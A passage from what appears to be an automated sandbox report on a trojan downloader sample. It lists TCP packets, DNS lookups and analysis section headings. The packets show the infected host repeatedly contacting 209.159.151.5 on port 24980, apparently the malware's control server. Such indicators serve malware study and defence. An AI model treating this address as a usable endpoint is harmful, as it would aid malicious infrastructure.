Nov 28, 2020 17:49:18.524070978 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524084091 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524096966 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524108887 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524130106 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524147987 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524174929 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524182081 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.524188042 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524204969 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524220943 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.524226904 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524228096 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.524233103 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.524238110 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.524241924 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524260044 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524276972 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524303913 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524311066 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.524327040 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524344921 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524358988 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.524359941 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524367094 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.524375916 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524393082 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524405003 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524410009 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.524419069 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524430990 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524436951 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.524447918 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524473906 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524482012 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.524497986 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524513960 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.524517059 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524533033 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524549007 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524549007 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.524566889 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524580956 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.524586916 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524605989 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524606943 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.524631977 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524636984 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.524653912 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524673939 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524688005 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.524698019 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524719000 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524724960 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.524740934 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524760008 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524772882 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.524781942 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524806976 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524821043 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.524831057 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524851084 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.524858952 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.524905920 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.628825903 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.628886938 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.628926039 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.628958941 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.628964901 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.629005909 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.629040956 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:18.629044056 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:18.629132986 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:19.798681021 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:19.954301119 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:20.054086924 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:20.105247021 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:20.109246016 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:20.209080935 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:20.261504889 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:20.266562939 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:20.266664982 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:20.370735884 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:20.387859106 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:20.492189884 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:20.493114948 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:20.641808987 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:20.747184992 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:20.891446114 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:22.361912966 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:22.402348995 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:22.605230093 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:22.751152992 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:23.407875061 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:23.589967966 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:27.375978947 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:27.569278002 CET	49679	443	192.168.2.3	20.190.129.130
Nov 28, 2020 17:49:27.569442987 CET	49679	443	192.168.2.3	20.190.129.130
Nov 28, 2020 17:49:27.590234041 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:27.605566025 CET	443	49679	20.190.129.130	192.168.2.3
Nov 28, 2020 17:49:27.605591059 CET	443	49679	20.190.129.130	192.168.2.3
Nov 28, 2020 17:49:27.607743025 CET	49694	443	192.168.2.3	20.190.129.130
Nov 28, 2020 17:49:27.607804060 CET	49694	443	192.168.2.3	20.190.129.130
Nov 28, 2020 17:49:27.637645960 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:27.644051075 CET	443	49694	20.190.129.130	192.168.2.3
Nov 28, 2020 17:49:27.657686949 CET	443	49679	20.190.129.130	192.168.2.3
Nov 28, 2020 17:49:27.698539019 CET	443	49694	20.190.129.130	192.168.2.3
Nov 28, 2020 17:49:27.755857944 CET	443	49679	20.190.129.130	192.168.2.3
Nov 28, 2020 17:49:27.755887985 CET	443	49679	20.190.129.130	192.168.2.3
Nov 28, 2020 17:49:27.755903959 CET	443	49679	20.190.129.130	192.168.2.3
Nov 28, 2020 17:49:27.755925894 CET	443	49679	20.190.129.130	192.168.2.3
Nov 28, 2020 17:49:27.755948067 CET	443	49679	20.190.129.130	192.168.2.3
Nov 28, 2020 17:49:27.755960941 CET	49679	443	192.168.2.3	20.190.129.130
Nov 28, 2020 17:49:27.755969048 CET	443	49679	20.190.129.130	192.168.2.3
Nov 28, 2020 17:49:27.755989075 CET	49679	443	192.168.2.3	20.190.129.130
Nov 28, 2020 17:49:27.755996943 CET	443	49679	20.190.129.130	192.168.2.3
Nov 28, 2020 17:49:27.756021976 CET	443	49679	20.190.129.130	192.168.2.3
Nov 28, 2020 17:49:27.756043911 CET	443	49679	20.190.129.130	192.168.2.3
Nov 28, 2020 17:49:27.756043911 CET	49679	443	192.168.2.3	20.190.129.130
Nov 28, 2020 17:49:27.756091118 CET	49679	443	192.168.2.3	20.190.129.130
Nov 28, 2020 17:49:27.788696051 CET	443	49694	20.190.129.130	192.168.2.3
Nov 28, 2020 17:49:27.788728952 CET	443	49694	20.190.129.130	192.168.2.3
Nov 28, 2020 17:49:27.788749933 CET	443	49694	20.190.129.130	192.168.2.3
Nov 28, 2020 17:49:27.788774967 CET	443	49694	20.190.129.130	192.168.2.3
Nov 28, 2020 17:49:27.788799047 CET	443	49694	20.190.129.130	192.168.2.3
Nov 28, 2020 17:49:27.788820982 CET	443	49694	20.190.129.130	192.168.2.3
Nov 28, 2020 17:49:27.788830042 CET	49694	443	192.168.2.3	20.190.129.130
Nov 28, 2020 17:49:27.788846016 CET	443	49694	20.190.129.130	192.168.2.3
Nov 28, 2020 17:49:27.788872004 CET	443	49694	20.190.129.130	192.168.2.3
Nov 28, 2020 17:49:27.788894892 CET	49694	443	192.168.2.3	20.190.129.130
Nov 28, 2020 17:49:27.788897991 CET	443	49694	20.190.129.130	192.168.2.3
Nov 28, 2020 17:49:27.788903952 CET	49694	443	192.168.2.3	20.190.129.130
Nov 28, 2020 17:49:27.788991928 CET	49694	443	192.168.2.3	20.190.129.130
Nov 28, 2020 17:49:27.798027039 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:27.808984041 CET	49679	443	192.168.2.3	20.190.129.130
Nov 28, 2020 17:49:31.532515049 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:31.590605974 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:32.393186092 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:32.590651035 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:32.676378965 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:32.828908920 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:37.409452915 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:37.450424910 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:37.732577085 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:37.891681910 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:39.647130013 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:39.700583935 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:42.414251089 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:42.466634989 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:42.802568913 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:42.959820032 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:47.429666996 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:47.482543945 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:47.756706953 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:47.810723066 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:47.896384954 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:48.053064108 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:50.393244982 CET	80	49683	93.184.220.29	192.168.2.3
Nov 28, 2020 17:49:50.393433094 CET	49683	80	192.168.2.3	93.184.220.29
Nov 28, 2020 17:49:50.444873095 CET	80	49678	93.184.220.29	192.168.2.3
Nov 28, 2020 17:49:50.446094036 CET	49678	80	192.168.2.3	93.184.220.29
Nov 28, 2020 17:49:51.076910019 CET	49688	80	192.168.2.3	104.123.31.226
Nov 28, 2020 17:49:51.077016115 CET	49687	443	192.168.2.3	104.83.127.80
Nov 28, 2020 17:49:51.106017113 CET	80	49688	104.123.31.226	192.168.2.3
Nov 28, 2020 17:49:51.106091976 CET	49688	80	192.168.2.3	104.123.31.226
Nov 28, 2020 17:49:51.106245995 CET	443	49687	104.83.127.80	192.168.2.3
Nov 28, 2020 17:49:51.106277943 CET	443	49687	104.83.127.80	192.168.2.3
Nov 28, 2020 17:49:51.106332064 CET	49687	443	192.168.2.3	104.83.127.80
Nov 28, 2020 17:49:51.106385946 CET	49687	443	192.168.2.3	104.83.127.80
Nov 28, 2020 17:49:51.125065088 CET	80	49682	93.184.220.29	192.168.2.3
Nov 28, 2020 17:49:51.125220060 CET	49682	80	192.168.2.3	93.184.220.29
Nov 28, 2020 17:49:52.426665068 CET	49692	443	192.168.2.3	92.122.145.129
Nov 28, 2020 17:49:52.426954031 CET	49693	80	192.168.2.3	93.184.220.29
Nov 28, 2020 17:49:52.446257114 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:52.498543978 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:52.875155926 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:53.021758080 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:53.480362892 CET	80	49691	93.184.220.29	192.168.2.3
Nov 28, 2020 17:49:53.480545044 CET	49691	80	192.168.2.3	93.184.220.29
Nov 28, 2020 17:49:54.284287930 CET	49703	443	192.168.2.3	204.79.197.200
Nov 28, 2020 17:49:54.285515070 CET	49704	443	192.168.2.3	204.79.197.200
Nov 28, 2020 17:49:55.881504059 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:55.936330080 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:57.463466883 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:57.514559031 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:57.921468973 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:58.068571091 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:02.468195915 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:02.515224934 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:02.991691113 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:03.141870975 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:03.987895966 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:04.030731916 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:07.471802950 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:07.515451908 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:08.112714052 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:08.267311096 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:12.112242937 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:12.156409979 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:12.486996889 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:12.531455994 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:13.126583099 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:13.282396078 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:17.501612902 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:17.549679041 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:18.126800060 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:18.282433987 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:20.239964008 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:20.282098055 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:22.518517971 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:22.563529968 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:23.235904932 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:23.391690016 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:27.532862902 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:27.579710960 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:28.330641031 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:28.362340927 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:28.407851934 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:28.485430002 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:32.548279047 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:32.595702887 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:33.377692938 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:33.532394886 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:36.485712051 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:36.533457994 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:37.564536095 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:37.611645937 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:38.424647093 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:38.579122066 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:39.799654961 CET	49678	80	192.168.2.3	93.184.220.29
Nov 28, 2020 17:50:39.799694061 CET	49683	80	192.168.2.3	93.184.220.29
Nov 28, 2020 17:50:39.799741030 CET	49685	443	192.168.2.3	20.190.129.130
Nov 28, 2020 17:50:39.799848080 CET	49681	80	192.168.2.3	2.20.142.210
Nov 28, 2020 17:50:39.815984011 CET	80	49678	93.184.220.29	192.168.2.3
Nov 28, 2020 17:50:39.816098928 CET	49678	80	192.168.2.3	93.184.220.29
Nov 28, 2020 17:50:39.816246033 CET	80	49683	93.184.220.29	192.168.2.3
Nov 28, 2020 17:50:39.816282034 CET	80	49681	2.20.142.210	192.168.2.3
Nov 28, 2020 17:50:39.816376925 CET	49681	80	192.168.2.3	2.20.142.210
Nov 28, 2020 17:50:39.816380978 CET	49683	80	192.168.2.3	93.184.220.29
Nov 28, 2020 17:50:39.836247921 CET	443	49685	20.190.129.130	192.168.2.3
Nov 28, 2020 17:50:39.836385965 CET	49685	443	192.168.2.3	20.190.129.130
Nov 28, 2020 17:50:40.003118038 CET	49679	443	192.168.2.3	20.190.129.130
Nov 28, 2020 17:50:40.003142118 CET	49694	443	192.168.2.3	20.190.129.130
Nov 28, 2020 17:50:40.039318085 CET	443	49679	20.190.129.130	192.168.2.3
Nov 28, 2020 17:50:40.039350986 CET	443	49694	20.190.129.130	192.168.2.3
Nov 28, 2020 17:50:40.039436102 CET	49679	443	192.168.2.3	20.190.129.130
Nov 28, 2020 17:50:40.039710045 CET	49694	443	192.168.2.3	20.190.129.130
Nov 28, 2020 17:50:40.112243891 CET	49682	80	192.168.2.3	93.184.220.29
Nov 28, 2020 17:50:40.128752947 CET	80	49682	93.184.220.29	192.168.2.3
Nov 28, 2020 17:50:40.128897905 CET	49682	80	192.168.2.3	93.184.220.29
Nov 28, 2020 17:50:42.579132080 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:42.623039007 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:43.425501108 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:43.579128027 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:44.610697031 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:44.659301996 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:47.596376896 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:47.643765926 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:48.550832987 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:48.704077005 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:52.611397028 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:52.659909010 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:52.763977051 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:52.816193104 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:53.551635027 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:53.704102993 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:54.920428038 CET	80	49691	93.184.220.29	192.168.2.3
Nov 28, 2020 17:50:54.920639038 CET	49691	80	192.168.2.3	93.184.220.29
Nov 28, 2020 17:50:57.627751112 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:50:57.675934076 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:58.582657099 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:50:58.735300064 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:51:00.848834991 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:51:00.894963980 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:51:02.644104958 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:51:02.691829920 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:51:03.645850897 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:51:03.798607111 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:51:05.076692104 CET	443	49690	204.79.197.200	192.168.2.3
Nov 28, 2020 17:51:06.020947933 CET	80	49691	93.184.220.29	192.168.2.3
Nov 28, 2020 17:51:06.021044016 CET	49691	80	192.168.2.3	93.184.220.29
Nov 28, 2020 17:51:07.658631086 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:51:07.707887888 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:51:08.970911026 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:51:09.020574093 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:51:09.211914062 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:51:09.361076117 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:51:12.673858881 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:51:12.723917961 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:51:14.490264893 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:51:14.642535925 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:51:17.097101927 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:51:17.146612883 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:51:17.690962076 CET	24980	49723	209.159.151.5	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 28, 2020 17:49:01.365673065 CET	60831	53	192.168.2.3	8.8.8.8
Nov 28, 2020 17:49:01.392847061 CET	53	60831	8.8.8.8	192.168.2.3
Nov 28, 2020 17:49:02.188767910 CET	60100	53	192.168.2.3	8.8.8.8
Nov 28, 2020 17:49:02.215718985 CET	53	60100	8.8.8.8	192.168.2.3
Nov 28, 2020 17:49:02.833033085 CET	53195	53	192.168.2.3	8.8.8.8
Nov 28, 2020 17:49:02.860352039 CET	53	53195	8.8.8.8	192.168.2.3
Nov 28, 2020 17:49:03.668102026 CET	50141	53	192.168.2.3	8.8.8.8
Nov 28, 2020 17:49:03.695293903 CET	53	50141	8.8.8.8	192.168.2.3
Nov 28, 2020 17:49:04.472825050 CET	53023	53	192.168.2.3	8.8.8.8
Nov 28, 2020 17:49:04.499989986 CET	53	53023	8.8.8.8	192.168.2.3
Nov 28, 2020 17:49:05.205583096 CET	49563	53	192.168.2.3	8.8.8.8
Nov 28, 2020 17:49:05.245820999 CET	53	49563	8.8.8.8	192.168.2.3
Nov 28, 2020 17:49:06.089550972 CET	51352	53	192.168.2.3	8.8.8.8
Nov 28, 2020 17:49:06.116694927 CET	53	51352	8.8.8.8	192.168.2.3
Nov 28, 2020 17:49:06.884823084 CET	59349	53	192.168.2.3	8.8.8.8
Nov 28, 2020 17:49:06.912450075 CET	53	59349	8.8.8.8	192.168.2.3
Nov 28, 2020 17:49:07.798429012 CET	57084	53	192.168.2.3	8.8.8.8
Nov 28, 2020 17:49:07.825588942 CET	53	57084	8.8.8.8	192.168.2.3
Nov 28, 2020 17:49:08.470161915 CET	58823	53	192.168.2.3	8.8.8.8
Nov 28, 2020 17:49:08.497859955 CET	53	58823	8.8.8.8	192.168.2.3
Nov 28, 2020 17:49:09.148407936 CET	57568	53	192.168.2.3	8.8.8.8
Nov 28, 2020 17:49:09.175578117 CET	53	57568	8.8.8.8	192.168.2.3
Nov 28, 2020 17:49:28.395394087 CET	50540	53	192.168.2.3	8.8.8.8
Nov 28, 2020 17:49:28.422703981 CET	53	50540	8.8.8.8	192.168.2.3
Nov 28, 2020 17:49:35.464407921 CET	54366	53	192.168.2.3	8.8.8.8
Nov 28, 2020 17:49:35.504997015 CET	53	54366	8.8.8.8	192.168.2.3
Nov 28, 2020 17:49:47.695863008 CET	53034	53	192.168.2.3	8.8.8.8
Nov 28, 2020 17:49:47.739499092 CET	53	53034	8.8.8.8	192.168.2.3
Nov 28, 2020 17:49:50.130630016 CET	57762	53	192.168.2.3	8.8.8.8
Nov 28, 2020 17:49:50.167737007 CET	53	57762	8.8.8.8	192.168.2.3
Nov 28, 2020 17:50:02.806616068 CET	55435	53	192.168.2.3	8.8.8.8
Nov 28, 2020 17:50:02.833656073 CET	53	55435	8.8.8.8	192.168.2.3
Nov 28, 2020 17:50:07.385375977 CET	50713	53	192.168.2.3	8.8.8.8
Nov 28, 2020 17:50:07.412429094 CET	53	50713	8.8.8.8	192.168.2.3
Nov 28, 2020 17:50:37.652371883 CET	56132	53	192.168.2.3	8.8.8.8
Nov 28, 2020 17:50:37.679497957 CET	53	56132	8.8.8.8	192.168.2.3
Nov 28, 2020 17:50:39.390965939 CET	58987	53	192.168.2.3	8.8.8.8
Nov 28, 2020 17:50:39.426575899 CET	53	58987	8.8.8.8	192.168.2.3

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe PID: 2440 Parent PID: 5572

General

